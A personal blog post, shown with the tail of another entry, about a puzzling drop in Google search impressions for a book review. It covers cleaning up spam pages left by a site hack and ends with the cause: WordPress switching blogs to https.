Do something about it? Conclusion? I replaced some of my links to the author’s site with a link to the book’s page on amazon.com. I moved one of the offending pages, the physics link list, over to radices.net – as I had planned to do for quite a while in my eternal quest for tidy, consistent web sites. The page is still available on this blog, but not visible in the menu anymore.

But I will not ask the author to remove a valid backlink or remove my innocuous post, it seems like succumbing to the rules of a silly game.

What I learned from this episode is that one single page – perhaps one you don’t even consider important on the grand scale of things and your blog in particular – can boost a blog or drag it down. Which pages are the chosen ones is beyond unpredictable.

Ending on a more positive note, I currently encounter the boost effect for our German blog, as we indulge in writing about the configuration of this gadget, the programmable control unit we use with our heat pump system. The device is very popular among ambitious DIY enthusiasts, and readers are obviously searching for it.

Programmable control unit

We are often linking to the vendor’s business page and manuals. I hope they will never link back to us.

I will just keep watching the patterns and reporting on my encounters. One of the next enigmas to be resolved: Why is the number of Google searches in my WordPress Stats much higher than the number of page impressions in Google Tools for that day, let alone clicks in Google Tools?

Update 2015-01-23: The answer was embarrassingly simple, and all my paranoia had been misguided. WordPress has migrated their hosted blogs to https only. All my traffic was hiding in the statistics for the https version which has to be added in Google Webmaster Tools as a separate website.

Waging a Battle against Sinister Algorithms

I have felt a disturbance of the force.

As you might expect from a blog about anything, this one has a weird collection of unrelated top pages and posts. My WordPress Blog Stats tell me I am obviously an internet authority on: how rodents get into kitchen appliances, about the physics of a spinning toy, about the history of the first heat pump, and most recently about how to sniff router traffic. But all those posts and topics are eclipsed by the meteoric rise of the single most popular ever article, which was a review of a book on a subfield in theoretical physics. I am not linking this post or quoting its title for reasons you might understand in a minute.

Checking out Google Webmaster Tools, the effect is even more pronounced. Some months ago this textbook review attracted by far the most Google search impressions and clicks. Looking at the data from the perspective of a bot, it might appear as if my blog had been created just to promote that book. Which is what I believe might actually have happened.

Concluding from historical versions of the book author’s website (on archive.org), the page impressions of my review started to surge when he put a backlink to my post on his page, sometime in spring this year.

But then in autumn this happened.

Page impressions for this blog on Google Webmaster Tools, Sept to Dec.

These are the impressions for searches from desktop computers (‘Web’), without image or mobile search. A page impression means that the link had been displayed on Google Search Results pages to some user. The curve does not change much if I remove the filter for Web.

For this period of three months, that article I Shall Not Quote is the top page in terms of impressions, right after the blog’s default page. I wondered about the reason for this steep decline as I usually don’t see any trend within three months on any of my sites.

If I decrease the time slot to the past month that infamous post suddenly vanishes from the top posts:

Page impressions and top pages in the last month

It was eradicated quickly – which can only be recognized when decreasing the time slot step-by-step. Within a few days at the end of October / beginning of November the entry seems to have been erased from the list of impressions.

I sorted the list of results shown above by the name of the page, not by impressions. Since WordPress posts’ names are prefixed with dates, you would expect to see any of your posts in that list somewhere, some of them of course with very low scores. Actually, that list does include also obscure early posts from 2012 nobody ever clicks on.

The former top post, however, did not get a single impression anymore in the past month. I have highlighted the posts before and after in the list, and I have removed all filters for this one, thus also image and mobile search are taken into account. The post’s name started with /2013/12/22/:

Last month, top pages, recent top post missing

Checking the status of indexed pages in total confirms that links have been recently removed:

Index status of this blog

For my other sites and blogs this number is basically constant – as long as a website does not get hacked. As our business site actually has been a month ago. Yes, I only mention this in passing as I am less worried about that hack than about that mysterious penalizing of this blog.

I learned that your typical hack of a website is less spectacular than what hacker movies make you believe: if you are not a high-profile target, hacker-spammers leave your site intact but place additional spammy pages with cross-links on it to promote their links. You recognize this immediately by a surge in the number of URLs and in indexing activity, and – in case your hoster is as vigilant as mine – by a peak in 404 Not Found errors after those spammy pages have been removed. This is the intermittent spike in spammy pages on our business site crawled by Google:

Crawl stats after the hack.

I used all tools at my disposal to clean up the mess the hackers caused – those pages had actually been indexed already. It will take a while until things like ‘fake Gucci belts’ are removed from our top content keywords. I removed the links from the index by editing robots.txt and by using the Google URL removal tool and the URL parameters tool (the latter comes in handy as the spammy pages had been indexed with various query strings, that is, parameters).
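Just for illustration – a minimal robots.txt sketch of such a clean-up, assuming the spammy pages had been dropped into a hypothetical /brands/ folder and were indexed with a hypothetical ?ref= query string (the real paths and parameters on our site were different). Google honours the * wildcard in Disallow rules:

User-agent: *
Disallow: /brands/
Disallow: /*?ref=

robots.txt only stops further crawling; URLs that are already in the index are hidden from search results with the URL removal tool, and the URL parameters tool can be used to tell Google how to treat query strings like the hypothetical ref.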

I had expected the worst, but Google has not penalized me for that intermittent link spam attack (yet?). Numbers are now back to normal after a peak in queries for that fake brand stuff:

Queries back to normal after the clean-up.

It was an awful lot of work to clean up those URLs popping up again and again every day. I am willing to fight the sinister forces without too much whining. But Google’s harsh treatment of the post on this blog freaks me out. It is not only the blog post itself that was affected but also the pages for its tags, categories, and archive entries. Nearly all of these pages – thus all the pages linking to the post – did not get a single impression anymore.

Google Webmaster Tools also tells me that the number of so-called Structured Data items for this blog has been reduced to nearly zero:

Structured data on this blog.

Structured Data are useful for pages that show e.g. product reviews or recipes – anything that has a pre-defined structure and might be presented according to that structure in Google search results, via nicely formatted snippets. My home-grown websites do not use those, but the spammer-hackers had used such data on their link spam pages – so on our business site we saw a peak in structured data at the time of the hack.

Obviously WP blogs use those by design. Our German blog is based on the same WP theme – but the number of structured data items there has been constant. So if anybody out there is using the theme Twenty Eleven, I would be happy to learn about your encounters with structured data.

I have read a lot – things I never wanted to know about search engine optimization, including hackers’ Black SEO. I recommend the recently published book Spam Nation by renowned investigative reporter and IT security insider Brian Krebs, whose page and book I will again not link.

What has happened? I can only speculate.

Spammers build networks of shady backlinks to promote their stuff. Common knowledge is, of course, that you should not buy links or build such link networks. Ironically, I have cross-linked all my own sites like hell for many years – not for SEO purposes but in my eternal quest for organizing my stuff: keeping things separate, yet adding the right pointers, Raking the virtual Zen Garden, etc. Never ever did this backfire. I was always concerned about the effect of my links and resources pages (links to other pages, mainly tech and science). Today my site radices.net, which was once an early German predecessor of this blog, is my big link dump – but still these massive link collections are not voted down by Google.

Maybe Google considers my posting and the physics book author’s website part of such a link scam. I have linked to the author’s page several times – to sample chapters, generously made available for download as PDFs – and the author linked back to me. I had so far refused to tie my blog to my Google+ account and claim ‘Google authorship’, as I did not want to trade elkement for my real name on G+. Via Webmaster Tools Google knows about all my domains, but they might suspect that I – a pseudonymous elkement, using an @subversiv.at address on G+ – also own the book author’s domain, which I – diabolically smart – did not declare in Webmaster Tools.

As I said before, from a most objective perspective Google’s rationale might not be that unreasonable. I don’t write book reviews that often; my most recent were about The Year Without Pants and The Glass Cage. I rather write posts triggered by one idea in a book, maybe not even the main one. When I write about books I don’t use Amazon affiliate marketing, as professional reviewers such as Brain Pickings or Farnam Street do. I write about unrelated topics. I might not match the expected pattern. This is amusing as long as only a blog is concerned, but in principle it is similar to being interviewed by the FBI at an airport because your travel pattern just can’t be normal (as detailed in the book Bursts, on modelling human behaviour – a book I also sort of reviewed last year).

In short, I sometimes review and ‘promote’ books without any return on that. I simply don’t review books I don’t like, as I think blogging should be fun. Maybe in an age of gamified reviews and fake forum posts with spammy signatures Google simply doesn’t buy into that. I sympathize. I learned that forum websites should add a nofollow attribute to any hyperlinks users post so that Google will not downvote the link targets. So links in discussion groups are considered spammy per se, and you need to do something about it so that they don’t hurt what you – as a forum user – are probably trying to discuss or recommend in good faith. I already live in fear that those links some tinkerers set in DIYers’ forums (linking to our business site or my posts on our heating system) will be considered paid link spam.
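For illustration, this is what such a nofollow link looks like in HTML – the URL below is a made-up placeholder, not an actual forum post:

<a href="https://example.com/our-heating-system/" rel="nofollow">worth a look</a>

The link still works for readers, but rel="nofollow" tells search engines not to count it for ranking purposes – so a recommendation made in good faith neither boosts the target nor, ideally, gets it treated like a bought link.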

However, I cannot explain why I can still find my book review post on Google (thus generating an impression) when searching for site:[URL of the post]. Perhaps consolidation takes time. Perhaps there is hope. I even see the post when I use Tor Browser and a foreign IP address, so this is not related to my preferences as a logged-in Google user. But unless there is a glitch in Webmaster Tools, no other typical searcher encounters this impression. I am aware of the tool for disavowing URLs, but I don’t want to report a perfectly valid backlink. In addition, that backlink from the author’s site does not even show up in the list of external backlinks, which is another enigma.

I know that this seems to be an obsession with a first world problem: this was a post on a topic in which I don’t claim expertise and which I don’t consider strategically important. But whatever happens to this blog could happen to other sites I am more concerned about, business-wise. So I hope it is just a bug and/or Google Bots will read this post and release my link. Just in case I mentioned your book or blog here, even if indirectly: please don’t backlink.

Perhaps Google did not like my ranting about encrypted search terms, which are not available to the search term poet. I dared to display the Bing logo back then – which I will do again now, as:

  • Bing tells me that the infamous post generates impressions and clicks.
  • Bing recognizes the backlink.
  • The number of indexed pages is increasing gradually with time.
  • And Bing did not index the spammy pages in the brief period they were on our hacked website.

Bing logo (2013)

Update 2014-12-23 – it actually happened twice:

Analyzing the impressions from the last day, I realize that Google has also treated my physics resources page Physics Books on the Bedside Table this way. Page impressions dropped, and now that page, which was the top one (after the review had plummeted), is gone, too. I had already considered moving this page to my site that hosts all those lists of links (without issues, so far): radices.net – and I will complete this migration in a minute. Now of course Google might think that I, the link spammer, am frantically moving on to another site.

Update 2014-12-24 – now at least results are consistent:

I cannot see my own review post anymore when I search for the title of the book. So finally the results from Webmaster Tools are in line with my tests.

Update 2015-01-23 – totally embarrassing final statement on this:

The answer was embarrassingly simple, and all my paranoia had been misguided: WordPress has migrated their hosted blogs to https only. All my traffic was hiding in the statistics for the https version, which has to be added in Google Webmaster Tools as a separate website.